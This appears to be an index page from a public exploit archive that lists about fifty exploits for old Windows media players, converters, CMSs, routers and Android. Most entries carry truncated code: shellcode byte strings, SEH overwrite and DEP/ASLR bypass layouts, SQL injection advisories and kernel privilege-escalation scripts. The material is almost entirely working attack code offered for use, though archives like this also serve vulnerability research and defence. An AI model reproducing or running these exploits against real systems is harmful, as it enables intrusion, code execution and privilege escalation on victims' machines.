ealtek-Audio-Control-Panel-1.0.1.65

App. has classic buffer overflow vulnerability it can be triggered by passing a too long argument as a startup parameter. Shellcode can by run via classic ret overwrite or SEH Handler overwrite filepath = "C:\ShellCode\RTLCPL 1.1.1.6 - Exploit.bin" f = openfilepath, "wb" f.write'BraniX'...

Foxit-Reader-4.1.1

Exploit Title : Foxit 4.1.1 Date : 13/11/2010 Author : Sud0 Bug found by : dookie Original POC : https://www.exploit-db.com/exploits/15514/ Software Link : http://www.foxitsoftware.com/downloads/index.php header ="\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x0A\x25\xE2\xE3\xCF\xD3\x0D" header...

Free-WMA-MP3-Converter-1.1

Free WMA MP3 Converter 1.1 Buffer Overflow Exploit SEH Coded By: DrIDE Date: November 10, 2010 Download: http://www.eusing.com/freewmaconverter/mp3wmaconverter.htm Tested on: Windows XPSP3 code= "\x80\x87\x78\x68\x80\x87\x78\x68\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59"...

Mp3-Nator-2.0-SEH

Exploit Title: Exploit Buffer Overflow MP3-Nator Date: 10\11\2010 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com...

Free-CD-to-MP3-Converter-3.1

Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit SEH Date: 10/18/10 Credit/Bug found by: C4SS!0 G0M3S Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe filename = 'crash.wav' windows/exec - 144 bytes http://www.metasploit.com Encoder: x86/shikataganai...

Sefrengo CMS 1.6.0 - SQL Injection

Sefrengo CMS 1.6.0 - SQL Injection Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0 Advisory ID: SROEADV-2015-04 Author: Steffen Rösemann Affected Software: CMS Sefrengo v.1.6.0 Release-Date: 18th-Feb-2014 Vendor URL: http://www.sefrengo.org/start/start.html Vendor Status...

Microweber CMS 0.95 - SQL Injection

Microweber CMS 0.95 - SQL Injection Exploit Title: SQL Injection in Microweber CMS 0.95 Google Dork: N/A Date: 12/16/2014 Exploit Author: Pham Kien Cuong [email protected] and ITAS Team www.itas.vn Vendor Homepage: Microweber https://microweber.com/ Software Link:...

Pirelli ADSL22+ Wireless Router P.DGA4001N - Information Disclosure

Pirelli ADSL22+ Wireless Router P.DGA4001N - Information Disclosure - Title: CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar - Author: Eduardo Novella @enovella [email protected] - Version: Tested on firmware version...

Nexus 5 Android 5.0 - Local Privilege Escalation

Nexus 5 Android 5.0 - Local Privilege Escalation / CVE-2014-4322 exploit for Nexus Android 5.0 author: retme [email protected] website: retme.net The exploit must be excuted as system privilege and specific SELinux context. If exploit successed,you will gain root privilege and "kernel" SELinux...

AdaptCMS 3.0.3 - Multiple Vulnerabilities

AdaptCMS 3.0.3 - Multiple Vulnerabilities !/usr/bin/env python AdaptCMS 3.0.3 Remote Command Execution Exploit Vendor: Insane Visions Product web page: http://www.adaptcms.com Affected version: 3.0.3 Summary: AdaptCMS is a Content Management System trying to be both simple and easy to use, as wel...

VideoSpirit-Pro-1.68

"VideoSpirit Pro is the most easily used Video Converter/Editor tools. For acting as a Video Editor, various slide effect/title/subtitle can be added to a video clip. Also, the video clip can be rotated, resized and warped. Multiple video/audio clips can be joined together. Converting speed is fa...

BS.Player-2.57-SEH

Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57UNICODE-SEH Date: 01\07\2010 Author: C4SS!0 G0M3S Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 import os import sys import time import string os.system"cls" os.system"color 4f" def usage: iflensys.argv!=3 or...

Music-Animation-Machine-MIDI-Player-SEH

Exploit Title: Music Animation Machine MIDI Player MAMX SEH BOF Date 1/4/2011 Author: Acidgen mailto:spama t hgrayhat.se Software Link: http://www.musanim.com/player/MAMPlayer2006aug19035.zip Version: 2006aug19 Release 035 junk='\x41' 112 seh='\xeb\x06\x90\x90' pad='\x90' 10 junk2='\x42' 9496 Sor...

CoolPlayer-2.18-DEP-Bypass

Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-DB Notes: May not work on all Win XP SP3 machines windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available shellcode =...

Digital-Music-Pad-8.2.3.4.8-(.pls)

Digital Music Pad Version 8.2.3.4.8 SEH overflow Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Vulnerable version DJ Studio Pro Version 8.2.3.4.8 filename = "POC.pls" windows/exec -...

MP3-CD-Converter-Professional-BoF-(SEH)

Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH Date: 12/20/2010 Author: C4SS!0 G0M3S Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe Version: 5.0.3 import os import sys import struct import time def usage: os.system"cls" os.system"color 4f" print"\n"...

Aesop-GIF-Creator-2.1

Aesop is a powerful tool that allows you to create animated GIF images banners, buttons, labels and headings for your website and even GIF wallpapers for your mobile phone quickly and easily click to see samples. You can use an antialiased 3D-Text, shapes rectangles, rounded rectangles, ellipses...

xRadio-0.95b-(.xrl)

xRadio is affected by stack-based buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successful exploitation of the vulnerability allows an attacker to execute arbitrary code. Other versions are also affected but have a different trigger...

AOL-Desktop-9.6-(.rtx)

NOTE: If exploit doesn't work turn AOL off CTRL+ALT+DELETE and turn all AOL processes off then try again Watch out for other bad chars !! Current bad chars: \x00\x0a\x0d\x20\x31\x90\x3e First Header hd1 = "\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"...

AOL-9.5-(rtx)-Local-Buffer-Overflow

Bug : AOL 9.5 rtx Local Buffer Overflow Exploit by sup3r Tested on : XP SP3 header1 = "\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"...

NetZip-Classic-SEH

Exploit Title: Exploit Buffer Overflow NetZip ClassicSEH Date: 01\30\2011 Author: C4SS!0 G0M3S Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html Version: 7.5.1.86 Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN def usage system"cls" system"color 4f"; end if ARGV.length !=1 usage...

WM-Downloader-3.1.2.2-2010.04.15-(.m3u)

WM Downloader 3.1.2.2 2010.04.15 .m3u Buffer Overflow + DEP Bypass Author: sickness Download : http://mini-stream.net/wm-downloader/ The payload can be replaced with whatever you want, there is enough space. import sys header='EXTM3U\n' junk ='http://'+'\x90' 17400 junk+='\x41'17 eip...

Virtuosa-Phoenix-Edition-5.2-ASX

Exploit Title: Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite Date found: Aug 16th 2010 Author: Acidgen Software Link: http://download1.virtuosa.com/VirtuosaTrial.exe Version: 5.2 junkA = '\x41' 1021 junkB = '\x42' 8979 nSEH = '\xeb\x06\xff\xff' SEH = '\x7e\xaa\x01\x10' nop = '\x90' 10...

Nokia-Multimedia-Player-1.0

Exploit Title: Nokia Multimedia player SEH Unicode Date: January 11 2011 Author: Carlos Mario Penagos Hollmann Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html Version: 1.00.55.5010 junk="\x44" 2660 shellcode =...

DVD-X-Player-5.5-Pro-SEH

DVD X Player 5.5 Pro Bypass ASLR by using non-aslr enabled module SEH Overwrite Egghunter is not needed as there is at least 2000 bytes for shellcode import sys print "====================================" print "DVD X Player 5.5 Pro Buffer Overflow" print " SEH Overwrite - Bypass ASLR " print "...

CoolPlayer-Portable-2.19.2-ASLR

Buffer overflow that bypasses ASLR by using a non-aslr module Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit Written by Blake 233 bytes for shellcode available 227 byte windows/exec shellcode = CMD=calc.exe shellcode=...

Free-MP3-CD-Ripper-1.1-DEP

Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit Date: 27\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version: 1.1 from struct import pack from time import sleep import os from sys import exit print ''' Created By C4SS!0...

Free-MP3-CD-Ripper-1.1

Exploit Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow Software : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version : 1.1 Tested on : Windows xp sp3 en Date : 27/08/2011 Author : X-h4ck Website : http://www.pirate.al , http://theflashcrew.blogspot.com Email : [email protected]...

MP3-CD-Converter-Professional-5.3.0

Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit Date: 11\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe from struct import pack from time import sleep from sys import exit print ''' Created By C4SS!0 G0M3S E-mail...

BlazeVideo-HDTV-Player-multi

Take a look at mona.py : awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ this is the old fashioned bug, i just try to make it universal : it has also been exploited by: import struct file = 'blazevideo-universal.plf' totalsize =...

AVCon-DEP-Bypass

DEP Bypass for OptIn/OptOut all modules used are not aslr aware script produces a text file, copy the contents paste in the input field next to the call button discovered by Dillon Beresford import sys from struct import pack around 619 bytes of space before seh overwrite if more space is needed,...

MY-MP3-Player-3.0-m3u

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe - 1014 bytes of space for shellcode shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...

Mini-Stream-Ripper-2.9.7-DEP

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...

Wav-Player-1.1.3.6-(.pll)

Open the wav player, make a playlist and save it. Then, close the player and run this exploit to create the new playlist. When you open again wav player, you will see the calc. fichero = open"wvplayer.pll", "w" print "+ Creating exploit .pll..." fichero.write"A"1034 Padding fichero.write"t%dA" he...

Microsoft-Office-2003-HomePro

Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 Authors: b33f Ruben Boonen g11tch Chris Hodges import binascii filename = "evil.doc" ----------------------------------------------------------------------------------- File Structure...

CCMPlayer-1.5-Stack-based

Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit .m3u Date: 30 Nov 2011 Author: Rh0 Software: CCMPlayer 1.5 m3u = "C:\" shellcode m3u p/p/r m3u Songs - Add - Files of type: m3u - msf.m3u = exploit filecreatem3u...

GOM-Player-2.1.33.5071-ASX-File-Unicode

Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. Version: 2.1.33.5071 Date: 30-11-2011 Author: Debasish Mandal Peter Van Eeckhoutte corelanc0d3r rawinput" Press Enter to generate the crafted ASX..." size = 2046 Shellcode WinExec "Calc.exe"...

Windows-XP-2003-Afd.sys-Escalation

MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit Author: [email protected] - Matteo Memelli HalDispatchTable+0x4+1 from ctypes import windll, CDLL, Structure, byref, sizeof, POINTER, cchar, cshort, cushort, cint, cuint, culong, cvoidp, clong, ccharp from ctypes.wintypes import HANDLE...

Aviosoft-Digital-TV-Player-Professional-1.x

Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow Author: modpr0be Software Download: http://www.aviosoft.com/download.php?product=dtvplayerpro Date: 08/11/2011 Tested on: Windows XP SP3, Windows 7 SP1 import struct file = 'adtvbof.plf' totalsize = 5000 junk = 'A' 8...

Office-2008-sp0-RTF-Pfragments

RTF Pfragments exploit for MAC office 2008 Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Office 2007 for MC SP 0 myfile = "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b"...

wicd-Local-Privilege-Esclation-Exploit

!/usr/bin/python wicd 1.7.1 0day exploit discovered on 4.9.12 by InfoSec Institute student For full write up and description go to http://www.infosecinstitute.com/courses/ethicalhackingtraining.html import sys import os import time import getopt try: from wicd import dbusmanager except: print "!...

Mini-stream-RM-MP3-Converter-3.1.2.2

Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 import os,sys header= "http://." junk= "\x41" 17416 A ESP = "\x13\x44\x87\x7C" 7C874413 FFE4 JMP ESP NOPS = "\x90" 16 ShellCode =...

lazeVideo-HDTV-Player-6.6-ASLR

Exploit: BlazeVideo HDTV Player 6.6 Professional SEH DEP ASLR Author: b33f - http://www.fuzzysecurity.com/ OS: Tested on Windows 7 32-bit PRO SP1 Software Link: http://www.blazevideo.com/download.htm Pro v6.6 - Apr 12, 2011 filename="blaze.plf"...

Bitsmith-PS-Knowbase-3.2.3

Personal Knowbase is a program for organizing free-form information using keywords. Build a personal knowledge base of all your notes, messages, and ideas. Store and index your information in one place for easy retrieval using keywords that you choose. The attachment feature even associates disk...

Blade-API-Monitor-Unicode-Bypass

This is a super strange exploit. First I would like to commend "FullMetalFouad" for the unicode work on the original exploit. Originally I wanted to see if I could simplify the process. While I was doing that I lost sight of the fact that the instructions had to be printable since we need to copy...

Sysax-5.62-Admin-Interface-

Title: Sysax 5.62 Admin Interface Local Buffer Overflow Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Date Discovered: June 15, 2012 Vendor Contacted: June 19, 2012 import socket,sys,time,re,base64,subprocess def main: global login print "\n" print "" print " Sysax " not in fullpage: page ...

Adobe-Illustrator-CS5.5

ImageType AlphaChannelCount reserved bin-ascii ImageMask XI Arguments to the XI operator specify the location and size of the image, its pixel bit depth, color type, and other attributes The image matrix maps the unit square of user space, bounded by 0, 0 and 1, 1 in user space, to the boundary o...

Lattice-Semiconductor-PAC-Designer-6.21

Exploit: Lattice Semiconductor PAC-Designer 6.21 possibly all versions CVE: CVE-2012-2915 Author: b33f Ruben Boonen - http://www.fuzzysecurity.com/ OS: WinXP SP1 Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm filename="evil.PAC" PAC1 = """ 1 ispPAC-CLK5410D...

Novell-Client-4.91-SP4-Escalation

Author: [email protected] Version Tested: Novell Client 4.91 SP4 Targets: Exploit works on all service packs of Win2K3 and WinXP except Windows XP SP1 from ctypes import import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi =...

nvSoft-Any-Video-Converter-4.3.6

Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow Author: cikumel @mhxx and y0k @riy0wid from @spentera research Website: http://www.spentera.com Platform: Windows import os,shutil,time,sys def banner: print "\n\tAnvSoft Any Video Converter 4.3.6 Stack Overflow" print "\tbased on PO...